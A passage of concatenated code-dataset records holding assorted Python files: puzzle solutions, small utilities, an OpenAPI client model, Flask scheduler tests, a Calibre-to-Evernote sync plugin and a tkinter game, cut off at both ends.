1\n c = int(sqrt_of_len) + 1\n final_ish = \"\"\n for j in range(c):\n for count, i in enumerate(plain_text):\n if count % c == j:\n final_ish += i\n return \" \".join(final_ish[i:i+r] for i in range(0, len(final_ish), r))\n","sub_path":"Exercism Python Track/Crypto_Square.py","file_name":"Crypto_Square.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"160663131","text":"def countSubstrings(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n palindrome_count = 0\n\n for i in range(len(s)):\n for j in range(i, len(s)):\n sub_str = s[i:j+1]\n if sub_str == sub_str[::-1]:\n # print(sub_str)\n palindrome_count += 1\n return palindrome_count\n\n\ndef countSubstrings_pythonic(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n sub_str_list = [s[i:j+1] for i in range(len(s)) for j in range(i, len(s)) if s[i:j+1] == s[i:j+1][::-1]]\n\n return len(sub_str_list)\n\n\ncheck_str = \"aabcdde\"\nres = countSubstrings(check_str)\nprint(res)\n\n","sub_path":"data_structures/string_countPalindromicSubstrings.py","file_name":"string_countPalindromicSubstrings.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45185365","text":"'''\n-Documentation here-\n'''\nimport menu\nimport os\ntoys = [\n {\"Name\":\"Woody\",\"Species\":\"Human\",\"Height\":15.8,\"NumFeet\":2,\"FirstAppearance\":1},\n {\"Name\":\"Jessie\",\"Species\":\"Human\",\"Height\":13.4,\"NumFeet\":2,\"FirstAppearance\":2},\n {\"Name\":\"Buzz Lightyear\",\"Species\":\"Human\",\"Height\":11.43,\"NumFeet\":2,\"FirstAppearance\":1}\n]\nos.system(\"cls\")\n#This is the start of the main function\nwhile True: #This loop is to ensure that the program does not just terminate after a single command\n command = menu.menu()\n \n if command == 1:\n menu.searchToy(toys)\n elif command == 2:\n toys = menu.declutter(toys)\n elif command == 3:\n added_toy = menu.addToys(toys)\n toys.append(added_toy) \n elif command == 4:\n menu.edit_toy(toys)\n elif command == 5:\n menu.playtime(toys)\n elif command == 6:\n selected_toy = menu.select_toy(toys)\n elif command == 7:\n menu.print_toy(toys)\n elif command == 8:\n menu.save(toys)\n elif command == 9:\n toys = menu.load(toys)\n elif command == 0:\n print(\n \"\\n================================================\\n\"\n + \"It's bedtime! Sleep dreams!\\n\"\n + \"================================================\\n\"\n )\n break","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283116412","text":"\"\"\"\nIn computer science and discrete mathematics, \nan inversion in a sequence is a pair of elements \nthat are out of their natural order.\nO(n*logn)\n\"\"\"\n\n\ndef count_inversions(array:list[int], score:int=0) -> list[list[int], int]:\n \"\"\"\n Counts inversions in the givven array\n and returns a sorted initial array with count of inversions\n \"\"\"\n length = len(array)\n half = int(length/2) if length % 2 == 0 else int(length/2) + 1\n score = score\n if length > 1:\n left, score_l = count_inversions(array[:half], score)\n right, score_r = count_inversions(array[half:], score)\n score += score_l\n score += score_r\n l_count = half\n r_count = length - half\n res = []\n for i in range(length):\n if l_count == 0:\n res.extend(right[-r_count:])\n break\n if r_count == 0:\n res.extend(left[-l_count:])\n break\n if left[-l_count] < right[-r_count]:\n res.append(left[-l_count])\n l_count -= 1\n if left[-l_count] >= right[-r_count]:\n res.append(right[-r_count])\n r_count -= 1\n score += l_count\n return [res, score]\n return [array, score]\n\n\narr = [6, 5, 4, 3, 2, 1]\nprint(count_inversions(arr))\n","sub_path":"calculations/count_inversions.py","file_name":"count_inversions.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164842999","text":"from LogisticRegressor import LogisticRegressor\nimport torch\nimport matplotlib.pyplot as plt\n\n# Generating synthetic data\nn_points_per_label = 50\nlabel_0_points = 3*torch.rand(n_points_per_label) + 3\nlabel_1_points = 3*torch.rand(n_points_per_label) + 5\n\nlabel_0 = torch.zeros(n_points_per_label)\nlabel_1 = torch.ones(n_points_per_label)\n\nx = torch.cat((label_0_points, label_1_points), 0).view(-1, 1)\ntarget = torch.cat((label_0, label_1), 0)\n\n# Instantiating and fitting the regressor \nregressor = LogisticRegressor()\nregressor.fit(x, target, n_iters=2000)\n\n# Getting the error during the fitting process\nerror = regressor.get_error()\n\n# Generating probability distribution curve\nx_test = torch.linspace(label_0_points.min(), label_1_points.max()).view(-1, 1)\npredicted = regressor.predict(x_test)\n\n# Plotting\nplt.style.use('ggplot')\nfig, ax = plt.subplots(2, 1)\nax[0].plot(x_test, predicted.detach(), color='black', label='Probability distribution')\nax[0].scatter(label_0_points, label_0, label=\"Class 0\")\nax[0].scatter(label_1_points, label_1, label=\"Class 1\")\nax[1].plot(error)\nax[0].legend()\nax[0].set_xlabel(\"Feature\")\nax[0].set_ylabel(\"Class labels/Probability\")\nax[1].set_xlabel(\"Iterations\")\nax[1].set_ylabel(\"Loss (Binary Cross Entropy)\")\n\nplt.suptitle(\"Logistic Regression Example\")\nplt.show()\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"548609976","text":"# coding: utf-8\n\n\"\"\"\n FlowAccount Open API\n\n # Introduction **Servers Production** Site: https://www.flowaccount.com Api url: https://openapi.flowaccount.com/v1 **Beta test** Site: http://sandbox-new.flowaccount.com/ Api url: https://openapi.flowaccount.com/test **PostMan Collection** Link: https://www.getpostman.com/collections/01e7c68d7093e2092a64 # noqa: E501\n\n The version of the OpenAPI document: 2-oas3\n Contact: developer_support@flowaccount.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom openapi_client.configuration import Configuration\n\n\nclass UpgradeDocument(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'record_id': 'int',\n 'reference_document_serial': 'str',\n 'reference_document_type': 'int'\n }\n\n attribute_map = {\n 'record_id': 'recordId',\n 'reference_document_serial': 'referenceDocumentSerial',\n 'reference_document_type': 'referenceDocumentType'\n }\n\n def __init__(self, record_id=None, reference_document_serial=None, reference_document_type=None, local_vars_configuration=None): # noqa: E501\n \"\"\"UpgradeDocument - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._record_id = None\n self._reference_document_serial = None\n self._reference_document_type = None\n self.discriminator = None\n\n self.record_id = record_id\n self.reference_document_serial = reference_document_serial\n self.reference_document_type = reference_document_type\n\n @property\n def record_id(self):\n \"\"\"Gets the record_id of this UpgradeDocument. # noqa: E501\n\n id ของเอกสารต้นทาง # noqa: E501\n\n :return: The record_id of this UpgradeDocument. # noqa: E501\n :rtype: int\n \"\"\"\n return self._record_id\n\n @record_id.setter\n def record_id(self, record_id):\n \"\"\"Sets the record_id of this UpgradeDocument.\n\n id ของเอกสารต้นทาง # noqa: E501\n\n :param record_id: The record_id of this UpgradeDocument. # noqa: E501\n :type: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and record_id is None: # noqa: E501\n raise ValueError(\"Invalid value for `record_id`, must not be `None`\") # noqa: E501\n\n self._record_id = record_id\n\n @property\n def reference_document_serial(self):\n \"\"\"Gets the reference_document_serial of this UpgradeDocument. # noqa: E501\n\n เลขที่เอกสารต้นทาง
Example: QT20200101 # noqa: E501\n\n :return: The reference_document_serial of this UpgradeDocument. # noqa: E501\n :rtype: str\n \"\"\"\n return self._reference_document_serial\n\n @reference_document_serial.setter\n def reference_document_serial(self, reference_document_serial):\n \"\"\"Sets the reference_document_serial of this UpgradeDocument.\n\n เลขที่เอกสารต้นทาง
Example: QT20200101 # noqa: E501\n\n :param reference_document_serial: The reference_document_serial of this UpgradeDocument. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and reference_document_serial is None: # noqa: E501\n raise ValueError(\"Invalid value for `reference_document_serial`, must not be `None`\") # noqa: E501\n\n self._reference_document_serial = reference_document_serial\n\n @property\n def reference_document_type(self):\n \"\"\"Gets the reference_document_type of this UpgradeDocument. # noqa: E501\n\n เลขประเภทของเอกสารต้นทาง
Quotaions = 3
Billing Notes = 5
Tax Invoices = 7
Example: 3 # noqa: E501\n\n :return: The reference_document_type of this UpgradeDocument. # noqa: E501\n :rtype: int\n \"\"\"\n return self._reference_document_type\n\n @reference_document_type.setter\n def reference_document_type(self, reference_document_type):\n \"\"\"Sets the reference_document_type of this UpgradeDocument.\n\n เลขประเภทของเอกสารต้นทาง
Quotaions = 3
Billing Notes = 5
Tax Invoices = 7
Example: 3 # noqa: E501\n\n :param reference_document_type: The reference_document_type of this UpgradeDocument. # noqa: E501\n :type: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and reference_document_type is None: # noqa: E501\n raise ValueError(\"Invalid value for `reference_document_type`, must not be `None`\") # noqa: E501\n\n self._reference_document_type = reference_document_type\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, UpgradeDocument):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, UpgradeDocument):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"flowaccount-python-client/openapi_client/models/upgrade_document.py","file_name":"upgrade_document.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"401195238","text":"import cv2\r\nimport glob\r\nimport isolate\r\nimg = [cv2.imread(file) for file in glob.glob(\"*.jpg\")]\r\n\r\nprint(len(img))\r\nfor i in range (len(img)):\r\n #imgCopy = img[i].copy()\r\n img[i] = isolate.findBackPlate(img[i])\r\n img[i] = cv2.cvtColor(img[i],cv2.COLOR_BGR2HSV)\r\n imgCopy = img[i].copy()\r\n #img[i] = cv2.inRange(img[i],(50,0,0),(310,255,255))\r\n mask1 = cv2.inRange(img[i], (50, 0, 0), (200, 255,230))\r\n\r\n ## mask o yellow (15,0,0) ~ (36, 255, 255)\r\n mask2 = cv2.inRange(img[i], (360,0,0), (360, 255, 220))\r\n\r\n ## final mask and masked\r\n mask = cv2.bitwise_or(mask1, mask2)\r\n target = cv2.bitwise_and(imgCopy,imgCopy, mask=mask)\r\n target = cv2.cv2.cvtColor(target,cv2.COLOR_HSV2BGR)\r\n cv2.imshow(\"image\",target)\r\n cv2.waitKey()\r\n \r\n\r\n'''\r\nimport cv2\r\nimport numpy as np\r\nimport glob\r\nimport isolate\r\nimport lineSearch\r\nfrom matplotlib import pyplot as plt\r\nimg = [cv2.imread(file) for file in glob.glob(\"*.jpg\")]\r\nfor i in range (len(img)):\r\n img[i] = cv2.resize(img[i], (int(img[i].shape[1]/3), int(img[i].shape[0]/3)))\r\n try:\r\n lineSearch.findLines(img[i],img[i],img[i])\r\n print(\"YES\")\r\n except:\r\n 2\r\n img[i] = isolate.findBackPlate(img[i],1.5,250,40,100,100,200)\r\n img[i] = isolate.findBackPlate(img[i],1.5,250,110,78,120,1000)\r\n edges = cv2.Canny(img[i],100,200)\r\n\r\n plt.subplot(121),plt.imshow(img[i],cmap = 'gray')\r\n plt.title('Original Image'), plt.xticks([]), plt.yticks([])\r\n plt.subplot(122),plt.imshow(edges,cmap = 'gray')\r\n plt.title('Edge Image'), plt.xticks([]), plt.yticks([])\r\n\r\n plt.show()\r\n cv2.waitKey()\r\n#circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1.5, 250,param1=40,param2=100,minRadius=100,maxRadius=200)\r\n#circles = cv2.HoughCircles(grey, cv2.HOUGH_GRADIENT, 1.5, 250,param1=110,param2=78,minRadius=120,maxRadius=300)\r\n'''\r\n","sub_path":"rootRecognition/edge_detection.py","file_name":"edge_detection.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"129855736","text":"#打开文件\n# file_name='demo.txt'\n\n#调用open来打开文件\n# file_obj=open(file_name)\n\n# #当我们获取了文件对象后,所以的对文件的操作都应该通过对象来进行\n# #读取文件中的内容\n# #read()方法,用来读取文件中的内容,它会将内容全部返回\t保存为字符串返回\n# content=file_obj.read()\n\n# print(content)\n\n# #关闭文件\n# #调用close()方法来关闭文件\n# file_obj.close()\n\n\n\n#with.......as语句\n# with open(file_name) as file_obj:\n# \t#在with语句中可以直接使用file_obj来做文件操作\n# \t#此时这个文件只能在with中使用,一旦with结束则文件会自动close()\n# \tprint(file_obj.read())\n\n\n\nfile_name='demo.txt'\n\ntry:\n\twith open(file_name) as file_obj :\n\t\tprint(file_obj.read())\nexcept FileNotFoundError:\n\tprint(f'{file_name} 文件不存在')\n","sub_path":"第七章code/05.关闭文件.py","file_name":"05.关闭文件.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"66297566","text":"# This file is part of sner4 project governed by MIT license, see the LICENSE.txt file.\n\"\"\"\ncontroller scheduler.task tests\n\"\"\"\n\nimport json\nimport os\nfrom http import HTTPStatus\n\nfrom flask import url_for\n\nfrom sner.server.model.scheduler import Queue, Task\nfrom tests.server.model.scheduler import create_test_task\n\n\ndef test_task_list_route(cl_operator):\n \"\"\"task list route test\"\"\"\n\n response = cl_operator.get(url_for('scheduler.task_list_route'))\n assert response.status_code == HTTPStatus.OK\n\n\ndef test_task_list_json_route(cl_operator, test_task):\n \"\"\"task list_json route test\"\"\"\n\n response = cl_operator.post(url_for('scheduler.task_list_json_route'), {'draw': 1, 'start': 0, 'length': 1, 'search[value]': test_task.name})\n assert response.status_code == HTTPStatus.OK\n response_data = json.loads(response.body.decode('utf-8'))\n assert response_data['data'][0]['name'] == test_task.name\n\n response = cl_operator.post(\n url_for('scheduler.task_list_json_route', filter='Task.name==\"%s\"' % test_task.name),\n {'draw': 1, 'start': 0, 'length': 1})\n assert response.status_code == HTTPStatus.OK\n response_data = json.loads(response.body.decode('utf-8'))\n assert response_data['data'][0]['name'] == test_task.name\n\n\ndef test_task_add_route(cl_operator):\n \"\"\"task add route test\"\"\"\n\n test_task = create_test_task()\n\n form = cl_operator.get(url_for('scheduler.task_add_route')).form\n form['name'] = test_task.name\n form['module'] = test_task.module\n form['params'] = test_task.params\n response = form.submit()\n assert response.status_code == HTTPStatus.FOUND\n\n task = Task.query.filter(Task.name == test_task.name).one()\n assert task.name == test_task.name\n assert task.module == test_task.module\n assert task.params == test_task.params\n\n\ndef test_task_edit_route(cl_operator, test_task):\n \"\"\"task edit route test\"\"\"\n\n form = cl_operator.get(url_for('scheduler.task_edit_route', task_id=test_task.id)).form\n form['name'] = form['name'].value+' edited'\n form['params'] = form['params'].value+' added_parameter'\n response = form.submit()\n assert response.status_code == HTTPStatus.FOUND\n\n task = Task.query.get(test_task.id)\n assert task.name == form['name'].value\n assert 'added_parameter' in task.params\n\n\ndef test_task_delete_route(cl_operator, test_job_completed):\n \"\"\"task delete route test\"\"\"\n\n test_queue = Queue.query.get(test_job_completed.queue_id)\n test_queue_data_abspath = test_queue.data_abspath\n test_task = Task.query.get(test_queue.task_id)\n assert os.path.exists(test_queue_data_abspath)\n\n form = cl_operator.get(url_for('scheduler.task_delete_route', task_id=test_task.id)).form\n response = form.submit()\n assert response.status_code == HTTPStatus.FOUND\n\n assert not Task.query.get(test_task.id)\n assert not os.path.exists(test_queue_data_abspath)\n","sub_path":"tests/server/controller/scheduler/test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29749777","text":"#!/usr/bin/env python\n# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai\nfrom __future__ import (unicode_literals, division, absolute_import,\n print_function)\n\n__license__ = 'GPL v3'\n__copyright__ = '2011, Kovid Goyal '\n__docformat__ = 'restructuredtext en'\n\n\nfrom PyQt5.Qt import QDialog, QVBoxLayout, QPushButton, QMessageBox, QLabel, QUrl, QInputDialog, QDir\n\nfrom calibre_plugins.calibrebeam.config import prefs\nimport calibre_plugins.calibrebeam.deps.evernote.edam.type.ttypes as Types\nfrom calibre.ebooks.BeautifulSoup import BeautifulSoup\nfrom calibre.gui2 import error_dialog, question_dialog, info_dialog, open_url\nimport socket\n\nclass calibrebeamDialog(QDialog):\n \n def __init__(self, gui, icon, do_user_config):\n # TODO: edit to be per user stamp?\n self.SENT_STAMP = '

COMMENTS ALREADY SENT TO EVERNOTE

'\n self.ANNOTATIONS_PRESENT_STRING = 'class=\"annotation\"'\n self.note_store = None\n\n QDialog.__init__(self, gui)\n self.gui = gui\n self.do_user_config = do_user_config\n self.cached_prefs_notebook_guid = None\n\n # The current database shown in the GUI\n # db is an instance of the class LibraryDatabase2 from database.py\n # This class has many, many methods that allow you to do a lot of\n # things.\n self.db = gui.current_db\n\n self.l = QVBoxLayout()\n self.setLayout(self.l)\n\n top_msg = 'Logged into evernote: ' + prefs['oauth_username'] if prefs['oauth_username'] else ''\n self.label = QLabel(top_msg)\n self.l.addWidget(self.label)\n \n self.devkey_token = \"1tjcaron-3617\"\n self.devkey_secret = \"5f3e4368a027d923\"\n\n self.setWindowTitle('Calibrebeam Evernote Sync')\n self.setWindowIcon(icon)\n self.init_buttons()\n self.resize(self.sizeHint())\n\n\n def init_buttons(self):\n self.send_new_button = QPushButton(\n 'Beam All Unsent Annotations', self)\n self.send_new_button.clicked.connect(self.send_only_new_highlights_to_evernote)\n self.l.addWidget(self.send_new_button)\n \n self.sync_highlighted_button = QPushButton(\n 'Beam Highlighted', self)\n self.sync_highlighted_button.clicked.connect(self.send_selected_highlights_to_evernote)\n self.l.addWidget(self.sync_highlighted_button)\n\n self.config_button = QPushButton(\n 'Settings', self)\n self.config_button.clicked.connect(self.config)\n self.l.addWidget(self.config_button)\n\n def config(self):\n self.do_user_config(parent=self)\n\n def authorize_plugin(self):\n username, ok_u = QInputDialog.getText(self, 'Input Dialog', 'Enter your Evernote Username:')\n if not ok_u:\n return None, None\n password, ok_p = QInputDialog.getText(self, 'Input Dialog', 'Enter your Evernote password:')\n if not ok_p:\n return None, None\n permission_msg = u'''\n Do you want to allow calibrebeam to:\n \\u2022 Create notes, notebooks and tags.\n \\u2022 List notebooks and tags.\n '''\n if not question_dialog(self, 'Allow Access', permission_msg):\n return None, None\n\n return username, password\n\n def connect_to_evernote(self):\n if self.note_store:\n return self.note_store\n else:\n return self.create_note_store()\n\n def create_note_store(self):\n try:\n from calibre_plugins.calibrebeam.config import get_username_and_token\n username, auth_token = get_username_and_token()\n return self.create_new_note_store(username, auth_token)\n except socket.gaierror:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n\n def get_auth_token(self, password, username):\n try:\n from calibre_plugins.calibrebeam.deps.geeknote.oauth import GeekNoteAuth\n gna = GeekNoteAuth()\n auth_token = gna.getToken(username, password)\n return auth_token\n except socket.gaierror or TypeError:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n return None\n\n def create_new_note_store(self, username=None, auth_token=None):\n reset_stored_creds = False\n if not (username and auth_token):\n reset_stored_creds = True\n username, password = self.authorize_plugin()\n if not (username and password):\n return None\n auth_token = self.get_auth_token(password, username)\n if not auth_token:\n # timout or connectivity or something\n return None\n if auth_token == \"ERROR\":\n # probably typed wrong stuffs\n info_dialog(self, 'EVERNOTE',\n 'Could not login. Please verify your Evernote username and password and try again.',\n show=True)\n return None\n from calibre_plugins.calibrebeam.deps.evernote.api.client import EvernoteClient\n client = EvernoteClient(token=auth_token, sandbox=True)\n self.note_store = client.get_note_store()\n # if we successfully made a note store, then we should save this token for next bootup\n if reset_stored_creds:\n from calibre_plugins.calibrebeam.config import save_username_and_token\n save_username_and_token(username, auth_token)\n self.label.setText('Logged into evernote as ' + prefs['oauth_username'])\n return self.note_store\n\n def send_selected_highlights_to_evernote(self):\n from calibre.gui2 import error_dialog, info_dialog\n if not self.connect_to_evernote():\n return\n # Get currently selected books\n rows = self.gui.library_view.selectionModel().selectedRows()\n if not rows or len(rows) == 0:\n return error_dialog(self.gui, 'Cannot beam highlights to Evernote',\n 'No books selected', show=True)\n # Map the rows to book ids\n ids = list(map(self.gui.library_view.model().id, rows))\n for book_id in ids:\n self.send_book_to_evernote(book_id)\n info_dialog(self, 'Updated files',\n 'beamed %d book highlights to Evernote!'%len(ids),\n show=True)\n \n def send_only_new_highlights_to_evernote(self):\n from calibre.gui2 import error_dialog, info_dialog\n if not self.connect_to_evernote():\n return\n # Get currently selected books\n rows = self.gui.library_view.selectionModel().selectedRows()\n if not rows or len(rows) == 0:\n return error_dialog(self.gui, 'Cannot beam highlights to Evernote',\n 'No books selected', show=True)\n # Map the rows to book ids\n #ids = list(map(self.gui.library_view.model().id, rows))\n ids = self.db.new_api.all_book_ids()\n sent_count = 0\n for book_id in ids:\n if self.send_book_to_evernote_if_nb(book_id, True):\n sent_count = sent_count + 1\n info_dialog(self, 'Updated files',\n 'sent %d book highlights to Evernote!'%sent_count,\n show=True)\n\n \n def send_book_to_evernote(self, book_id):\n return self.send_book_to_evernote_if_nb(book_id, False)\n\n\n def send_book_to_evernote_if_nb(self, book_id, uses_send_filters):\n # Get the current metadata for this book from the db\n metadata = self.db.get_metadata(book_id, index_is_id=True,\n get_cover=True, cover_as_data=True)\n \n if uses_send_filters:\n annotations_raw = self.get_annotations_raw_from_metadata(metadata)\n annotations_raw = '' if annotations_raw == None else annotations_raw\n if self.SENT_STAMP in annotations_raw:\n return False\n if self.ANNOTATIONS_PRESENT_STRING not in annotations_raw:\n return False\n \n noteName = self.make_evernote_name(metadata)\n myAnnotations = self.make_evernote_content(metadata)\n self.create_note(noteName, myAnnotations, self.note_store)\n self.stamp_annotations_if_nb(book_id)\n return True\n\n\n def get_annotations_raw(self, book_id):\n metadata = self.db.get_metadata(book_id, index_is_id=True,\n get_cover=True, cover_as_data=True)\n return self.get_annotations_raw_from_metadata(metadata)\n\n\n def get_annotations_raw_from_metadata(self, metadata):\n return metadata.get('comments')\n\n\n def set_annotations_raw(self, book_id, annotations):\n self.db.set_comment(book_id, annotations)\n self.db.commit()\n \n #stamp annotations if need be\n def stamp_annotations_if_nb(self, book_id):\n annotes = self.get_annotations_raw(book_id) \n annotes = '' if annotes == None else annotes \n commentStamp = self.SENT_STAMP\n if commentStamp not in annotes:\n self.set_annotations_raw(book_id, commentStamp + annotes)\n\n\n def make_evernote_name(self, metadata):\n return metadata.get('title')\n\n\n def make_evernote_content(self, metadata):\n annotations = self.get_annotations_raw_from_metadata(metadata)\n soup = BeautifulSoup(annotations)\n plainAnnotations = '
' + '
\\n
'.join(soup.findAll(text=True)) + '
' \n myAnnotations = plainAnnotations.encode('ascii', errors='ignore').encode('utf-8') \n content = ''\n content += ''\n content += ''\n content += myAnnotations\n content += ''\n return content\n\n\n def create_note(self, title, content, note_store):\n note = Types.Note()\n note.title = title\n note.content = content\n if prefs['tagsCsv']:\n note.tagNames = prefs['tagsCsv'].split(\",\")\n if prefs['notebook']:\n nb_guid = self.create_evernote_notebook_if_not_exits()\n if not nb_guid:\n return\n note.notebookGuid = nb_guid\n try:\n created_note = note_store.createNote(note)\n except socket.gaierror:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n return\n\n\n def create_evernote_notebook_if_not_exits(self):\n nb_name = prefs['notebook']\n if not self.connect_to_evernote():\n return\n nb_guid = self.get_notebook_guid_if_exists(nb_name)\n if not nb_guid:\n notebook = Types.Notebook()\n notebook.name = nb_name\n try:\n created_nb = self.note_store.createNotebook(notebook)\n except socket.gaierror:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n return\n nb_guid = created_nb.guid\n print(\"Successfully created a new notebook with GUID: \" + created_nb.guid)\n return nb_guid\n\n\n def get_notebook_guid_if_exists(self, nb_name):\n try:\n for nb in self.note_store.listNotebooks():\n if nb.name.lower() == nb_name.lower(): # TODO: make note of this caviat in docs\n print(nb_name + \" Notebook exists already GUID: \" + nb.guid)\n self.cached_prefs_notebook_guid = nb.guid\n return nb.guid\n except socket.gaierror:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n return None\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"294423261","text":"# Import module \nfrom tkinter import *\nimport tkinter\nfrom winsound import *\nimport winsound\nfrom tkinter import messagebox\n\n# from glob import glob\n\n\n\n# Create object \nroot = Tk() \nroot.title(\"Create by @SomPhors\")\n# Adjust size \nroot.geometry(\"1000x600\") \nroot.resizable(0,0)\n\n# Create Canvas \ncanvas1 = Canvas( root, width = 800, height = 600) \ncanvas1.pack(fill = \"both\", expand = True) \n\n\n# Variable................................................................................................\nlevelArray = []\nlevelnumber = []\narray = []\nclicksound = True\nheartnumber = 0\nRight = False\nLeft = False\nDown = False\nUp = False\npoint = 0\nwin = False\nLose = False\n# Function ....................................................................................................................\n\n# Display sound................................................................................................................\ndef displaysound():\n global clicksound\n if clicksound:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\click.wav\", winsound.SND_FILENAME)\n\n# Drawing.......................................................................................................................\ndef drawgraphic():\n global array,point\n positionX = 200\n positionY = 30\n for n in range(len(array)):\n for r in range(len(array[n])):\n\n if array[n][r] == 1:\n canvas1.create_image( positionX, positionY, image = wall, anchor = \"nw\", tags=\"wall\")\n elif array[n][r] == 2:\n canvas1.create_image( positionX, positionY, image = spacecrafter1, anchor = \"nw\", tags=\"craft\")\n elif array[n][r] == 3:\n canvas1.create_image( positionX, positionY, image = Earth, anchor = \"nw\", tags=\"craft\")\n elif array[n][r] == 5 or array[n][r] == 6:\n canvas1.create_image( positionX, positionY, image = Animy, anchor = \"nw\", tags=\"animy\")\n elif array[n][r] == 0:\n canvas1.create_image( positionX, positionY, image = coin3, anchor = \"nw\", tags=\"gold\")\n\n elif array[n][r] == 4:\n canvas1.create_rectangle( positionX, positionY, positionX+30, positionY+30, outline=\"white\", fill=\"white\", tags=\"craft\")\n positionX +=30\n positionX = 200\n positionY += 30\n canvas1.create_text(840, 80, text = \"Point: \"+str(point), fill=\"white\", font=\"DotGothic16 14 italic bold\", tags=\"point\")\n if win:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n messagebox.showinfo(message=\"You Win\")\n\n elif Lose:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\gameover5.wav\", winsound.SND_FILENAME)\n canvas1.create_image( 300, 200, image = over, anchor = \"nw\", tags=\"over\")\n messagebox.showinfo(message=\"Game over\")\n\n# Delete heart.................................................................................................................\ndef lift():\n global heartnumber, Lose\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\lose4.wav\",\n winsound.SND_FILENAME)\n heartnumber += 1\n print(heartnumber)\n if heartnumber == 1:\n canvas1.delete(\"heart1\")\n elif heartnumber == 2:\n canvas1.delete(\"heart2\")\n elif heartnumber == 3:\n canvas1.delete(\"heart3\")\n elif heartnumber == 4:\n Lose = True\n\n# Check spacecraft.............................................................................................................\ndef findSpacecraft():\n global array, Down, Left, Right, Up, point, win\n \n spacecraft = []\n for num1 in range(len(array)):\n for num2 in range(len(array[num1])):\n if array[num1][num2] == 2:\n spacecraft.append(num2)\n spacecraft.append(num1)\n if Up:\n if array[spacecraft[1]-1][spacecraft[0]] == 0 or array[spacecraft[1]-1][spacecraft[0]] == 7:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n point += 5\n array[spacecraft[1]-1][spacecraft[0]] = 2\n array[spacecraft[1]][spacecraft[0]] = 7\n elif array[spacecraft[1]-1][spacecraft[0]] == 5 or array[spacecraft[1]-1][spacecraft[0]] == 6:\n lift()\n elif array[spacecraft[1]-1][spacecraft[0]] == 3:\n win = True\n Up = False\n\n elif Down:\n if array[spacecraft[1]+1][spacecraft[0]] == 0 or array[spacecraft[1]+1][spacecraft[0]] == 7:\n winsound 